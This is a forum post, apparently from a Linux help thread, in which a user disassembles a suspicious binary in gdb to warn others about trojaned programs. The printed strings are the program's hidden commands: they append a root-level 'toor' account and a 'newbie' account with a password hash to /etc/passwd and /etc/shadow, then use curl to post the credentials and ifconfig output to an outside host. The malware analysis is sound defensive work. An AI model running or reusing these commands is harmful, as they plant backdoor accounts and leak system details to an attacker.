View Single Post
Old 08-28-07, 12:21 PM   #4
evilghost
Registered User
 
Join Date: Jul 2005
Posts: 3,606
Default Re: Watch what you trust.

When disassembling, these are the things to look for, note the system calls:

Code:
0x08048feb <main+262>:  call   0x8048628 <system@plt>
0x08048ff0 <main+267>:  movl   $0x8049534,(%esp)
0x08048ff7 <main+274>:  call   0x8048628 <system@plt>
0x08048ffc <main+279>:  movl   $0x8049588,(%esp)
0x08049003 <main+286>:  call   0x8048628 <system@plt>
0x08049008 <main+291>:  movl   $0x80495bc,(%esp)
0x0804900f <main+298>:  call   0x8048628 <system@plt>
0x08049014 <main+303>:  movl   $0x8049468,0x4(%esp)
And now, what they do:

Code:
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>:   "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>:    "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049588
0x8049588 <__dso_handle+984>:    "echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd"
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>:   "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x804960c
0x804960c <__dso_handle+1116>:   "/usr/bin/curl -d \"user=newbie&pass=novice&target=$(ifconfig -a)\" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null"
evilghost is offline   Reply With Quote